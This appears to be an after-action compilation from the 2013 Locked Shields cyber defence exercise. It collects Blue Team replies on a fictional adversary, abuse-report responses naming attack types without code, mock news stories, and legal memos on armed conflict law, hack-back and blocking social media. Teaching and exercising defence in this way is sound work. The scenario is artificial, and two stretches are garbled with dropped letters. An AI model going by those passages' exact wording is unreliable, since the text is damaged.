2) Based on the fact that we have seen three (3) ongoing attacks at the same time against our systems, and taking into account the different skill-sets (web, network etc.) which are needed to execute those attacks, we believe that we are dealing with multiple teams or attacker groups whose activities are coordinated. These are not tasks that 1 or 2 attackers can do by themselves. Adding the fact that other teams are also under attack, we estimate the size of the attackers to be more than 20 persons.

3) We have seen very simple "script-kiddie" style web attacks and lately more sophisticated attacks against our mail servers. Regarding capabilities, based on the attacks we have seen they are able to carry out the following:
* web attacks including databases;
* attacks against Linux servers and services;
* client side attacks on Windows systems;
* different network and services vulnerability scans.
Skill-set: medium.

4) Motivation: To cause problems to the AID organisation who is helping to mitigate the cholera epidemic.

5) Goal: From the military side, possibly stealing confidential information. On AID networks, causing problems to service availability.

Regards,
BT8

3.3. Response from BT7

You can read the below information regarding your request.
- Who are they? We have identified IP addresses but we cannot assess who is behind them. Members of BIT are expected to use cyber space to achieve their objectives.
- How many are there? Tens of IPs changing dynamically when they are identified.
- How capable are they? Attackers have a high technical level. We have undergone several sophisticated attacks. You can find additional information in the "situational reporting" (1100Z-13:00Z).
- What is their motivation? If the attackers are BIT members, the motivation is ethnic cleansing.
- What are their goals? Aid orgs and NATO troops are objectives since they are trying to prevent ethnic cleansing and provide relief to the civil population both in the north and south areas of the country.

4. Adversary Assessment II

4.1. Description

Inject text: Coalition intelligence asks for a 200-word assessment update on the adversary. You have 30 minutes to reply via e-mail.

Injection time: beginning of 4th Phase. Response expected in 30 minutes.
Injection method: e-mail from [email protected].
Inject feedback: e-mail to [email protected].
Rationale: check if the BT is paying attention to the news, as well as to clues left by the Red Team. Can they put the puzzle together?

4.2. Response from BT8

1) Who? Unfortunately, we still have no hard evidence regarding the attackers' identity. Given the fact that there are lots of attacks against AID systems' availability, the local extremist speculations may be correct.

2) How many? Based on the attacks we have seen today we estimate that the attackers have gained additional resources (more people). We have again seen many multiple attack attempts, plus the attacks are getting more sophisticated and more vectors are used. We estimate the attackers' number to be 30 or even more; they are possibly organised into smaller groups and given specific tasks.

3) Capacity: as yesterday, we have seen the following capabilities:
* web attacks including databases;
* attacks against Linux servers and services;
* client side attacks on Windows systems;
* different network and services vulnerability scans.
In addition, today we have also seen the following:
* well hidden backdoors planted in our systems which were deployed a long time ago;
* attacks against routing infrastructure (BGP);
* spam.
The adversary is well resourced and attack activities are coordinated.

4) Motivation / Goal:
* Disrupt AID services, in order to cause problems coordinating cholera epidemic response activities.
* We have seen more data-stealing attacks. Stolen data is used to discredit our public reputation (released to media) and also used for conducting additional attacks.

4.3. Response from BT5

Sir,

All attacking IP addresses have been confirmed to come from BIT known addresses. This information is based upon collaboration with other Blue Teams, internal knowledge databases and attack signatures. We have identified the exploits used, the back doors installed in systems and the tools used to exploit these vulnerabilities. From an attribution point of view, even though the attacks come from BIT addresses, these attacking systems may be botnets (pre-controlled systems) used by sympathisers as a launching pad. BT is talking to legal to raise the issue.

brgds

5. Abuse Report

5.1. Description

Inject text: Coalition CERT has received an abuse report about a server (…) hosting malware on your network. Please verify this and get back to us in 30 minutes with a summary of facts and what you have done to fix the situation.

Injection time: in 3rd Phase trigger, 30 minutes after RT obj 08c2.
Injection method: e-mail from [email protected].
Inject feedback: e-mail to [email protected]

5.2. Response from BT4

Hello J6

We haven't found any malware sites on our … . If we did find any, our steps would include stopping the service, deleting the files and removing the accounts. All this after we would log and gather all possible data for later analysis.

5.3. Response from BT8

Dear HQ,

Regarding your order about investigating possible malware hosting on …:
* Our experts did not find any evidence of malware hosting at our web server.
* We have double checked our web server, PHP and WordPress configuration files plus checked all filesystem permissions. Everything is in order.

5.4. Response from BT7

Good morning CERT

We have detected attacks against … . Suffered attacks:
a) Directory traversal attack. Malicious IP =
b) SQL injection against /etc/shadow. Malicious IP =
c) Sophisticated SQL injection using automatic tools. Malicious IP = , ,
d) Attack against database. Malicious IP =
Actions:
1) Filter at Firewall. IPs blocked.
2) Forensic Team is analysing this server looking for malicious software installed. By now, this team hasn't found any malware installed. We have just checked our IDS looking for malicious outbound activity and our IDS doesn't show any warning.
+++
In any case, thank you for your information. We are going to increase technical resources for investigating the server. As soon as we find something we'll inform you.

94 1 f 5 Cntents 1. BT1 ignrance: Everything is wrking prperly! 2. NATO Prepares fr Cyber War in Blea 3. BT4: We Will Find These Hackers and Punish Them! 4. Attacking Aid Organisatins Equals t Murder 5. BT5 We Are the Best! But Others TECH ANALYSIS: NATO has difficulties with BGP 7. Members f the Calitin Cnfirm Plans t Hack Back 1. BT1 ignrance: Everything is wrking prperly! Wednesday, April 24th, 2013 Much t LS News surprise, Blue Team 1 sees n prblem in the fact that the site aid1.news.ex has carried the message Hacked by BIT fr the last cuple f hurs. This srt f ptimism stands ut in the middle f difficulties NATO has been experiencing in this cyber war BT1 CHIEF PIO says: April 24, 2013 at 10:29 am DENIAL In relatin t what stated in the article, I firmly want t make a cuple f pints cncerning the statement I was quted fr, Everything is wrking prperly cntained in the title. First, the statement was deprived f its secnd part, althugh we are experiencing minr attempts t the net security. Secnd, and mre imprtant: what I said, crrectly, was exclusively referred t BT1-supprted AID rganizatins. As fr BT7, I expressed ur deepest slidarity. This, fr the sake f the truth and accuracy. G.M. BT1 CHIEF PIO 2. NATO Prepares fr Cyber War in Blea Wednesday, April 24th, 2013

H.N., Washington Poster

For the first time, an international peacekeeping force has deployed cyber teams to prepare for a possible cyber war. This represents a significant foray for NATO and the UN into the growing domain of cyber war. Under the aegis of a NATO Mission under UN Security Council resolution 1973, 10 cyber teams from NATO and Finland have deployed to Boolea. This is the first such deployment in an international mission, and represents the greatest contribution cyber defence has made to an international mission so far.

NATO has dealt actively with the risk from cyber attacks since 2007, when tiny NATO Ally Estonia was subject to massive cyber attacks that disabled civilian life in that country for several days. Estonia is one of the countries providing a Blue Team in the conflict.

Boolea is an isolated country with IT infrastructure straight out of the 1980s. To counter these difficulties, NATO is bringing additional internet to the country through satellite uplinks, and is providing this internet to the local population. Reports indicate that NATO is inviting local Booleans to access the internet free of cost at 15 cyber cafes set up throughout the country. Several Blue Teams confirmed similar versions, quoting one: "These cyber cafes are set up next to local water and food distribution centers set up to counter the ongoing cholera epidemic in Boolea."

The Washington Poster spoke with Blue Teams from coalition forces deployed in Boolea. Of the 10 teams deployed, only 5 responded to media inquiries. So far, these cyber forces are confident in their abilities. There were conflicting reports about whether there have been any cyber attacks so far. Blue8 reports no attacks so far, Blue5 reports daily attacks against aid organisations. The teams were quite confident of their capabilities, with Blue8 reporting: "Our knowledge about system administration is on top level and we are willing to help others out with our knowledge; we're on top of things."
This confidence did not however prevent disruptions in the networks of Aid1, Aid2 and Aid8's website, all of which were down at various points in the last day. It remains unclear how the cyber mission is integrated into the larger NATO operation. Blue1 called the cyber operation "a mission within a mission", echoing concerns raised last month during Congressional testimony that the Alliance still does not know how to integrate cyber into its overall missions. Even though NATO has been working on interoperability and a joint approach for decades,

national differences remain in the teams. The German team responded to this inquiry in terse legalese, while Italy's cyber team provided long and detailed comment. In coming days, it will be interesting to see how national differences play out in responding to cyber attacks.

3. BT4: We Will Find These Hackers and Punish Them!
Wednesday, April 24th, 2013
Blue 4 has opened a quest for the mysterious BIT group. "We will find them and punish them using all available legal means." Whether this means setting up a local hacker court remains to be seen.

4. Attacking Aid Organisations Equals to Murder
Wednesday, April 24th, 2013
BT8 has taken a stand against the hackers damaging their systems, claiming that the attackers are heartless people who have no respect for human lives. Although BT8 is not willing to call out the potential attackers and they are hiding behind the complicity of attribution, the fingers point to BIT. BIT is responsible for many other defacement events happening all over Boolea today. BT8 has been quick to note that during the attacks no sensitive data was stolen. At the same time their spokesperson admitted that this was simply thanks to the fact that no such data was ever kept on this system. One does wonder what would have happened if such data had been there and BIT had got hold of it.

5. BT5: We Are the Best! But Others...
Wednesday, April 24th, 2013
With all systems and teams suffering from heavy attacks from the still unnamed adversary, BT5 is boasting that they can take whatever comes. May it be apocalypse for all they care. The spokesperson for BT5 said to our reporter that they have even been assisting other teams on what to do and sharing a lot of information with others. It seems that not that much info is coming back to the team from others. Although not expressed directly, BT5 feels they are superior to other teams and may even have to go and help the others out.

6. TECH ANALYSIS: NATO has difficulties with BGP
Thursday, April 25th, 2013
Crabs on Security Blog Post

Sources inform LSMedia that various teams in the multinational cyber force in Boolea are using the BGP to encrypt communications. Blue6, Blue7, Blue8 are attempting to set up encrypted communications amongst each other. Blue6 has been able to establish encrypted comms with Blue8, but so far has been unsuccessful in encrypting comms with Blue7. Both teams pointed at difficulty configuring Blue7's router. Crabs will get to you with more analysis as the story unfolds.
NOTE: THIS STORY IS UPDATED TO REFLECT FOLLOWING CORRECTIONS:

7. Members of the Coalition Confirm Plans to Hack Back
Thursday, April 25th, 2013
LS Media has contacted several Blue Teams to confirm rumours on the coalition planning to launch an offensive operation against BIT. Many teams admit that the BIT attacks have become more sophisticated: "The attackers seem to be experts, we've seen very complex attacks in all systems, both in Linux, on the net, communications devices. The hackers are able to attack any part of the system," BT7 explained. As to the data leaks of aid organisations, BT7 did not show much concern: "As far as we can tell it is just personal data. This is not critical." "Yes, I can confirm we have heard about the plan to hack back, but we need more time to confirm this," said the spokesperson for BT1, promising to get back with further information. BT3 refrained from commenting on the issue.

BT4 said there are no plans to attack back at the moment, but BT4 does have such capabilities ready if the need arises. Similarly, BT9 expressed their frustration about the situation: "No, we cannot attack, there's a lawyer who won't let us do that!" BT6 are considering the option but are also afraid of not being allowed to go on with the operation: "We might change our mind in the future," the BT6 spokesperson said. Some teams however firmly denied these intentions: "Offensive capabilities are not part of the rules of engagement of this operation," BT5, BT7, BT8, BT10 and BT2 stressed. "All steps must be taken in accordance with international law," BT2 added.

Contents
1. Inject 1, Day 1
2. Inject 2, Day 1
3. Inject 4, Day 1
4. Inject 1, Day 2
5. Inject 2, Day 2
6. Inject 4, Day 2

1. Inject 1, Day 1

1.1. Inject Description
Dear legal advisors,
As a natural first step in taking up new responsibilities, we need to brief our men and women on the important legal issues. I have asked everyone to gather at 07:15Z tomorrow for a short 10-minute briefing, so please take this into account and prepare an overview for them. I specifically want you to address these topics:
To the extent you find it relevant, explain what the applicable law is.
Explain to your team members what their legal status is; which requirements they have to comply with as a result of their status and also what the enemy may do to them as a result of their status.
How do the rights and obligations of civilians that accompany our mission differ?
How should our forces present in Boolea act when the opposition forces commit illegal activities, including cyber activities, against them?
Since I will not be able to attend this briefing, send the text of the brief to me ([email protected]) by 08:00Z. Also, please provide a brief overview (max 300 words) of how it went.
Nicole Underwood
Head Legal Advisor
Joint Command

1.2. Response from Blue Team
To the extent you find it relevant, explain what the applicable law is.
International law also applies to operations in cyber space, which our team is tasked to do. We are a coalition military IT team, with a task to provide and secure military and aid organisations' unclassified systems in Boolea until aid crisis response teams arrive. The coalition is operating under a United Nations Security Council mandate. Our military operations are therefore governed by international law. Of course provisions of the own national laws of the Troop Contributing Nations (TCN) also apply when the TCN considers what actions it can take in this operation.

The law of armed conflict applies to coalition operations, also in cyberspace (the coalition is conducting military operations in southern Boolea and a Non-International Armed Conflict currently exists in Boolea). Also, provisions of the European Convention on Human Rights have to be taken into account by those coalition members which are EU members. Additionally, international human rights law can be applicable in areas under coalition control. Finally, selecting the applicable law on cyber activities can sometimes be legally challenging, since a nation can exercise jurisdiction over persons which are engaged in cyber operations in its territory, over cyber infrastructure which is located in its territory and sometimes extraterritorially (for example if an act is aimed against a certain nation or if the act is committed by its citizen). There are also some crimes that nations have universal jurisdiction on, for example war crimes.

Explain to your team members what their legal status is; which requirements they have to comply with as a result of their status and also what the enemy may do to them as a result of their status.
The situation in Boolea can be regarded as a Non-International Armed Conflict (hostilities between governmental armed forces and an organized armed group (BIT)). We are part of the military IT team of the coalition armed forces and therefore we can be regarded as fighters (not combatants). For this reason the enemy may lawfully attack us. We are authorized to use force in self-defence or according to valid rules of engagement, but we do not have combat immunity. This means that we are not entitled to prisoner of war status and in theory can be prosecuted for activities that are unlawful according to Boolean law, if Boolean authorities capture us (but since we are on the same side as the Boolean government, this is highly unlikely). All our actions and cyber operations must comply with the principles of necessity and proportionality (also those that do not qualify as an attack). Also, when employing a new cyber weapon or altering an existing one, a legal review has to be conducted on whether its use would cause superfluous injury or unnecessary suffering, is by nature indiscriminate or its use may be expected to breach the rules of armed conflict applicable in the current situation, and whether there is any ad hoc provision of treaty or customary international law that directly addresses it. If there is a Status of Forces Agreement (SOFA) between Boolea and the coalition forces, this might also contain provisions regarding our immunity and status in Boolea. (At least we should have legal immunity while conducting official duties.)

How do the rights and obligations of civilians that accompany our mission differ?
Civilians are protected from attack. However, if they directly participate in hostilities they can be lawfully targeted and lose their protection (but not civilian status). On the other hand it is not forbidden (according to international law) for civilians to participate in hostilities. This means that if they are captured while engaging in cyber operations, they could be prosecuted for activities that are unlawful according to Boolean law (in theory). If there is a SOFA with Boolea, the coalition civilian component is also likely to enjoy most of the same legal immunities as the military component (for example legal immunity in official duties).

How should our forces present in Boolea act when the opposition forces commit illegal activities, including cyber activities, against them?
Coalition forces are operating under a UNSC mandate. Coalition forces can use force either for self-defence or according to valid Rules of Engagement. Coalition forces can also conduct cyber operations on these same grounds. The mandate authorizes coalition forces to take all necessary measures to protect civilians and civilian populated areas under threat of attack in Boolea. If

activities, including cyber activities, by the opposing forces can be considered actions which are endangering civilians and civilian populated areas, coalition forces are authorized to conduct the necessary actions in order to defend them. Offensive actions are currently prohibited by our Rules of Engagement and thus all actions must be of a defensive nature. All illegal activities, including cyber activities, committed by the opposition forces must be reported immediately through the chain of command.
LEGAD Blue Team

1.3. Response from Blue Team
Overview of briefing
In order to adequately provide our team with information on the nature of the conflict, the applicable law, the status of our team members and the ROE, we briefed them this morning at 07:15Z. Within the timeframe we expanded on the issues at hand and we were even able to have a short discussion with our technical team members. The subjects discussed revolved around direct participation in the cyber domain and the territorial scope of application. The merger of views of a technical and legal nature proved valuable for both sides. In conclusion, a briefing with fulfilling results by virtue of the diverse nature of the blue teams.
Presentation (slides not reproduced)


2. Inject 2, Day 1

2.1. Inject Description
Legads,
I need you to look at a few issues which were raised by the HQ. Please get back to me by 10:00Z.
The ROE of the mission prohibit offensive cyber operations. Does this prohibition apply in any situation? When can it be violated (if at all)? How does it affect or limit the exercise of the right to self-defence? Can you only defend within the borders of the network?
A non-international armed conflict has to be limited to the territory of the state where the conflict is taking place. Is this relevant in the context of defensive cyber operations?
MGen Alex Ander

2.2. Response from Blue Team
Question 1
The ROE of the mission prohibit offensive cyber operations.
a. Does this prohibition apply in all situations?
The ROE apply to any offensive cyber situation, and cannot be violated. However, the ROE do not apply to defensive cyber operations. So: not in all situations, as was the question.
b. When can it be violated (if at all)?
It cannot be violated (as a matter of policy, as this is one of the ROE), insofar as it concerns offensive cyber operations.
c. How does it affect or limit the exercise of the right to self-defence?

Generally, the system of ROE is that ROE do not inhibit the right of self-defence. Thus, ROE apply to any situation covered by them, which does not include a situation of self-defence.
d. Can you only defend within the borders of the network?
The degree to which any offensive or forward defensive cyber action (e.g. taken outside of the own network) can be considered as self-defence is a subject of some debate. For this debate, see J. Boddens Hosang, Self-Defence in Military Operations: the Interaction between the Legal Bases for Military Self-Defence and Rules of Engagement, in: Revue de droit militaire et de droit de la guerre, vol. 47, no. 1-2, p /. The goal of (extended or unit) self-defence is to repel an attack. Self-defence is governed by the principles of necessity and proportionality; therefore an attack against one's own networks would have to have (the threat of) serious consequences to warrant more severe countermeasures such as targeting the source of the attacks by either digital or kinetic means. For less threatening attacks, actions in self-defence within one's own network, such as patching, firewalls etc., would be more appropriate given the principles of necessity and proportionality.

Question 2
A non-international armed conflict has to be limited to the territory of the state where the conflict is taking place. Is this relevant in the context of defensive cyber operations?
It is relevant for defensive and offensive cyber operations alike, insofar as they are part of the armed conflict. Some defensive operations do not qualify as hostilities (see the debate in Rule 30 of the Tallinn Manual). Insofar as they do qualify as hostilities, the rules pertaining to the conduct of hostilities apply to them. The geographical scope of a classic NIAC (internal armed conflict or civil war) is limited to the territory of the state involved (as it is by definition non-international in nature). This follows from the reading of Common Article 3 to the Geneva Conventions (CA3). This implies that military operations as part of this NIAC are limited to the territory of the state. However, modern analysis and doctrine of armed conflicts, especially the conflicts often referred to as 'transnational armed conflicts', have resulted in a more liberal interpretation. Modern NIACs are often more suitably characterized by the nature of the warring parties involved than by their geography, the essence of a NIAC being an armed conflict in which at least one non-state actor is involved. This may take place on the territory of the state party to this conflict, but also outside its territory. This interpretation is used by i.a. Liesbeth Zegveld in Accountability of Armed Opposition Groups in International Law, Cambridge: Cambridge University Press (2002), p. 136: "The conclusion is that internal conflicts are distinguished from international conflicts by the parties involved rather than by the territorial scope of the conflict." This reading is shared by Marc Sassòli in Transnational Armed Groups and International Humanitarian Law, Harvard University (Winter 2006) (accessed: ), p. 9; and D. Jinks (2003a), September 11 and the Laws of War, in: 28 Yale Journal of International Law (Winter 2003), p. 39. It is also applied by the ICTR in its Statute (see Art. 1 and 7 of the Statute of the ICTR). The Tallinn Manual specifically pays attention to this phenomenon in Rule 21 (p. ), whilst noting two opposing views: the classical interpretation based on geography and the liberal interpretation based on the status of the warring parties. Defensive cyber operations in the context of the current conflict in BOOLEA may be undertaken from the AOR (located in BOOLEA), since the UN mandated force is no occupation force (as mentioned in UN SC Resolution 2066). The effects could be 'located' inside and outside BOOLEA, according to the modern reading on the geographical scope of NIACs. Mind you: the modern reading would also suggest that defensive cyber operations could also be launched from the territory of the states participating in the UN mandated force.

3. Inject 4, Day 1

3.1. Inject Description
Hello! I'm a journalist fascinated by the legal side of this conflict and was given your address by the coalition's public affairs officer. I would be really interested in hearing your opinion on the issues below. Please respond by the end of the day, as I am on a deadline.
I read from a report that this is a non-international armed conflict. How can this be the case when 9 nations and NATO are present in Boolea with military forces?
What is cyber warfare, after all? How do you as a lawyer understand it? Is what's happening in Boolea cyber warfare?
Do you think we need new rules, a new treaty for cyber warfare? With cyber crime, this is exactly what happened: a special treaty was signed.
I have a copy of the Boolean penal code here, and by looking at its provisions on cyber, it seems that any cyber activity is illegal. Does this mean that should the Coalition be commanded to conduct cyber attacks, you will face the threat of prosecution by Boolean authorities?
I would appreciate if you could get back to me today because my story will be published already tomorrow. Thank you in advance!
Jerry Hobbs

3.2. Response from Blue Team 2
From BT2
TO: Jerry Hobbs
Dear Teams,
Hello! I'm a journalist fascinated by the legal side of this conflict and was given your address by the coalition's public affairs officer. I would be really interested in hearing your opinion on the issues below. *Please respond by the end of the day, as I am on a deadline.*

I read from a report that this is a non-international armed conflict. How can this be the case when 9 nations and NATO are present in Boolea with military forces?
The Law of Armed Conflict (LOAC) distinguishes two types of armed conflict: international armed conflicts, between two or more States, and non-international armed conflicts, between governmental forces and non-governmental armed groups, or between such groups only. In the Boolean situation a conflict is going on between the Boolean Government and opposing forces (i.e. extremists, i.a. the BIT). The international UN Mandated force is also subject to attacks by extremist groups. The UN mandated force is not in a conflict with the Boolean governmental forces. Hence the conflict is between governmental forces (Boolean and/or Troop Contributing Countries to the UN mandated mission) on the one hand, and violent extremists (i.a. the BIT) on the other hand. Although a lot of nations (and NATO) are involved, the conflict is defined by the lack of a state-state confrontation. For the sake of the argument, it is assessed that the threshold of a non-international armed conflict is indeed crossed. For references: see /eng/assets/files/other/opinion-paper-armed-conflict.pdf

What is cyber warfare, after all? How do you as a lawyer understand it? Is what's happening in Boolea cyber warfare?
Cyber warfare could be used to refer to a number of phenomena. First of all, in a strict reading, cyber warfare is defined by the Dutch Advisory Council on International Affairs as the conduct of military operations to disrupt, mislead, modify or destroy an opponent's computer systems or networks by means of cyber capabilities. See: AIV & CAVV

(2011): Advisory Council on International Affairs (AIV) & Advisory Committee on Issues of Public International Law (CAVV), Cyber Warfare (report no. 77/22, 2011), see <. The Dutch government has confirmed that definition in Parliament. It is clear that this strict reading should be placed in the context of military operations in general, and in the context of armed conflict in particular. Secondly, cyber warfare is also used, most often by the general public and the media, as an overarching concept referring to threats and counter-measures in cyber space. The wide interpretation may be misleading, as it suggests that cyber espionage and cyber crime would be an element of cyber warfare, which they aren't. Cyber activities of this kind, however, may be part of an existing armed conflict, as is the case in Boolea. Several cyber activities can be observed right now. They range from defacement to activities that hamper availability to some extent. As these disrupt our computer systems to some degree, some of the cyber incidents, provided they are related to one of the opposing parties in the armed conflict, may indeed be qualified as cyber warfare proper.

Do you think we need new rules, a new treaty for cyber warfare? With cyber crime, this is exactly what happened: a special treaty was signed.
There are multiple opinions in this respect. For some, this is indeed the case. Others, like the authors of the Tallinn Manual, take the stance that the existing LOAC is flexible and adaptive, and, although interpretation and clarification is needed, the old LOAC may embrace cyber warfare rather well. See in this respect also: P. Ducheine, J. Voetelink, J. Stinissen & T. Gill, Towards a Legal Framework for Military Cyber Operations, in: P. Ducheine, F. Osinga and J. Soeters (eds.), Cyber Warfare: Critical Perspectives, NL ARMS 2012, The Hague: TMC Asser Press (2012), pp.

I have a copy of the Boolean penal code here, and by looking at its provisions on cyber, it seems that any cyber activity is illegal.
Although no question was posed, the answer would be as follows. That may be the case. However, human behaviour and activities that are illegal in times of peace (murder, etc.) may be authorized in times of armed conflict (killing enemies). If the cyber activities are permitted under the LOAC and the Rules of Engagement, they are lawful under that body of international law.

Does this mean that should the Coalition be commanded to conduct cyber attacks, you will face the threat of prosecution by Boolean authorities?
In general the coalition should respect the local Boolean laws and regulations. Prior to deployment, it is most likely that a status of forces agreement (SOFA) has explicitly pointed out the issue of jurisdiction and immunities. In general, Troop Contributing Nations retain exclusive jurisdiction over their troops. Therefore, prosecution for criminal behaviour normally will be in the hands of the TCN. Once the troops find themselves in an armed conflict, the jurisdiction will be the exclusive prerogative of the TCN. See: J.E.D. Voetelink, Status of Forces: Strafrechtsmacht over militairen vanuit internationaalrechtelijk & militair-operationeel perspectief (Status of Forces: criminal jurisdiction over military personnel from an international-law and military-operational perspective), Diss. University of Amsterdam. The question suggests that criminal rules have been violated, which is not the case up till now (based on the current reports).

I would appreciate if you could get back to me today because my story will be published already tomorrow. Thank you in advance!
Jerry Hobbs

3.3. Response from Blue Team 8
Dear Mr. Hobbs,
Please find below the comments to your questions from Blue Team 8.

I read from a report that this is a non-international armed conflict. How can this be the case when 9 nations and NATO are present in Boolea with military forces?
For an armed conflict to be international two elements are required: a. the conflict has to be armed and b. an international element. This generally means a conflict between two or more states. In the current case the parties to the conflict are the state of Boolea on the one hand and the opposition armed group BIT on the other hand. The coalition acting under the UNSC mandate is acting in support of the Boolean government. This does not render the conflict international since the coalition is not fighting against another state. The activities of BIT are not attributable to any state. Therefore legally it is a non-international armed conflict. The important question here is: why does it matter? Unlike in international armed conflicts, the whole body of the law of armed conflict/international humanitarian law is not applicable in non-international armed conflicts. One of the main significances is that the opposition armed group does not have a legitimate belligerent status and members of those groups are not combatants. Under Boolean internal law this group is most likely a criminal group.

What is cyber warfare, after all? How do you as a lawyer understand it? Is what's happening in Boolea cyber warfare?
In general any hostile use of cyber space that amounts to use of force and armed conflict can be considered cyber warfare. Legally the emphasis is not on cyber as such but on the fact of use of force (in the sense of ius ad bellum) or the existence of armed conflict. Cyber means are just another means of conducting these hostile activities and international law on use of force and on armed conflict is applicable to those activities. As the situation in Boolea is qualified as a non-international armed conflict, we can say that the activities carried out in cyber space by the parties to the conflict must also respect the norms of LOAC that are applicable to non-international armed conflict.

Do you think we need new rules, a new treaty for cyber warfare? With cyber crime, this is exactly what happened: a special treaty was signed.
As I explained above, cyber warfare is not happening in a legal vacuum: international law norms on use of force and on armed conflict are applicable and these norms must be applied in cyber conflicts. In certain cases the specific application of certain norms might need further clarification due to specificities of cyber space. State practice will in the years to come clarify many issues that might seem vague today. A good example of trying to clarify how the norms of international law apply in cyber space is the Tallinn Manual (see ). In this initiative a group of independent experts of international law have analysed how existing international law norms apply in cyber space. A new convention would have to be an initiative of a group of like-minded countries, but at the moment there does not seem to be a will in the international community for such a convention. The situation with the convention on cyber crime is different since crimes are generally a matter of internal law of countries and law enforcement. The Budapest convention does not regulate cyber crime as such, but the goal of the convention is to enhance co-operation between countries in fighting cyber crime.

I have a copy of the Boolean penal code here, and by looking at its provisions on cyber, it seems that any cyber activity is illegal. Does this mean that should the Coalition be commanded to conduct cyber attacks, you will face the threat of prosecution by Boolean authorities?

The coalition is acting under the UNSC mandate and the rules of engagement with the goal of protecting civilians in Boolea. The government of Boolea has authorised the coalition's activities. Therefore members of the armed forces of the coalition cannot be prosecuted under Boolean internal law and are subject to the sending nations' jurisdiction.
With kind regards,
BT8 LEGAD

3.4. Response from Blue Team 9
Dear Jerry,
Thank you for your questions!
The nations you mentioned are participating in the conflict by assisting the Boolean government. For this reason the nature of the conflict is not an international armed conflict. (There is no existing conflict between at least 2 different nations.)
Cyber warfare is not actually so different from conventional warfare. The most common definition for cyber warfare is that it is the use of computers and other devices to attack the enemy's information systems as opposed to, for example, the enemy's armies or factories. As a lawyer I would basically understand it as operations taking place in cyberspace. It can be discussed and debated whether what is happening in Boolea amounts to cyber warfare. However, it can be said that opposing forces have attempted to cause serious harm to the humanitarian aid operation in Boolea through illegal cyber activities.
In my opinion, we do not need any new rules or treaties for cyber warfare. Instead, we should encourage international discussion and examination of the means and methods of cyber warfare. The recent special treaty on cyber crimes was in my opinion necessary, because cyber crimes are often highly multinational and efficient co-operation between nations is needed in order to counter them.
The provisions of the Boolean penal code do not in my opinion forbid Boolean authorities (and also the international coalition operation assisting the Boolean government) from defending themselves against illegal cyber activities, which is the case in the current situation. Naturally we respect Boolean laws.
Best regards,
LEGAD Blue Team 9

4. Inject 1, Day 2

4.1. Inject Description
Legal advisors,
Since the cyber attacks on the coalition forces are growing out of control, we need another brief tomorrow morning at 07:00Z. It will have to be quick, no more than 15 minutes, because people need to be at the computers trying to get a hold of the situation. Address the following questions and anything else you find critical:
Go through the media reports of today and analyse whether you need to give pointers to the technical experts when communicating with the media.
Does the increase in attacks broaden the range of options for legitimate responses?
There is press information suggesting war crimes are being committed by BIT. Advise the commander of his responsibilities for logging data.
Everything else remains the same: I will again need a memo of the brief, what you said and how the brief went.
Nicole Underwood
Head Legal Advisor
Joint Command

4.2. Response from Blue Team 10
Dear Mrs Underwood,

today's legal briefing was short again. Regarding the communication with the media, we discussed the question how (far) we communicate our view on the attribution of certain attacks. As a result of this discussion we will stay with our cautious (terse legalese) style. Here is the summary of what I said:

Legal Briefing Locked Shields, 2nd Day
1 media
1.1 fact: some negative reports (e.g. payment of the Support teams, doubts regarding the neutrality of the aid orgs because of coalition IT support)
1.2 check if our answers may have negative effects
1.3 emphasize that: we are here to help the aid orgs and the Boolean people; the coalition does not try to gain influence in the aid orgs; the coalition wouldn't use aid org equipment for the coalition's own aims
2 increased attacks
2.1 media reports indicate that this conflict still may be considered a non-international one
2.2 if that would be the case, we could act in self-defense against the cyber attacks
2.3 regarding the principle of proportionality, our range of defensive cyber means would increase with the range of attack means
2.4 BUT: we continue to perform defensive operations ONLY. The attribution problem is still unsolvable.
3 war crimes by BIT
3.1 logging/documentation of what we do, to prevent false accusations that our team members or the coalition forces committed (cyber) war crimes
3.2 we should log the attackers' operations as well, as long as it doesn't interfere with our defensive operations, so we can prevent reports that the coalition hinders the prosecution of war crimes.
****
Best Regards
BT10-Legal

5. Inject 2, Day 2

5.1. Inject Description
Legads,
The HQ has brought up an additional issue. Please have a look at it and get back to me by 10:00Z.
Considering that the attackers are creating some buzz on social media, and potentially will be coordinating attacks against us there, please advise what measures we can take, should the need arise, in order to shut down access to those sites. Can we block access to those websites or take them down? Or, alternatively, could we deface those sites?
MGen Alex Ander

5.2. Response from Blue Team 8
Dear MGen Ander,
Here are the LEGAD comments to your question:
As a first step you could ask the owner of the social media website to filter the posts, or if the owner is reluctant to co-operate then the same could be asked from the ISP. If the site owner or ISP do not respond or refuse, then a request could be made under the internal law of the social media website's country (law enforcement issue). Taking the issue to LOAC level would be very risky and sensitive.

113 15 f 16 First wuld it be permissible under the SC mandate (threat f attack against civilians)? That wuld prbably require very wide interpretatin f the mandate. Secnd, wuld it be permissible under the ROE (defensive actin nly)? Third, yu wuld have t prve that the website is a cmmunicatin channel f the adversaries and is used t gain military advantage (military bjective) it wuld be very difficult t prve it (again, requires very wide interpretatin). Als, it wuld nt lk gd in a demcratic sciety. In additin any interference in private media wuld bring abut claims against the calitin since they are private cmpanies and wuld lse revenues. Mst f the site cntents have nthing t d with the cnflict. In cnclusin it is feasible but it is a matter f cnditins and cnsequences. POLAD advice wuld be needed, taking int accunt all the legal questins referred abve. BT8 LEGAD 5.3. Respnse frm Blue Team 10 Dear MG Ander, I strngly recmmend, NOT t take any f the measures yu mentined! Blcking/Shuting dwn At first, the blcking (r shuting dwn) f scial media wuld interfere with the right f free speech, that prbably all f the calitins natins see as fundamental right. The blckade wuld nt nly affect the attackers, but als nrmal users. Besides this, recent develpements in the arabian wrld have shwn, that the cmmunicatins can't be blcked in ttal. S the attackers wuld prbably find a way t crdinate their attacks. Therefre the nly victim f the blckade wuld be the peaceful ppulatin. Regarding this, i dn't see a reasnable prprtinality between the psitive effects fr ur cyberdefense (sme bstacles in crdinatin f the attacks) and the negative effects n the right f freedm f speech. Defacements I am nt sure, what psitive effects yu expect frm a defacement. I just can imagine, that yu want t alter the messages t place false infrmatin. S the crdinatin effrts may be disrupted. But therefre hacking the servers prbably wuld be necessary. 
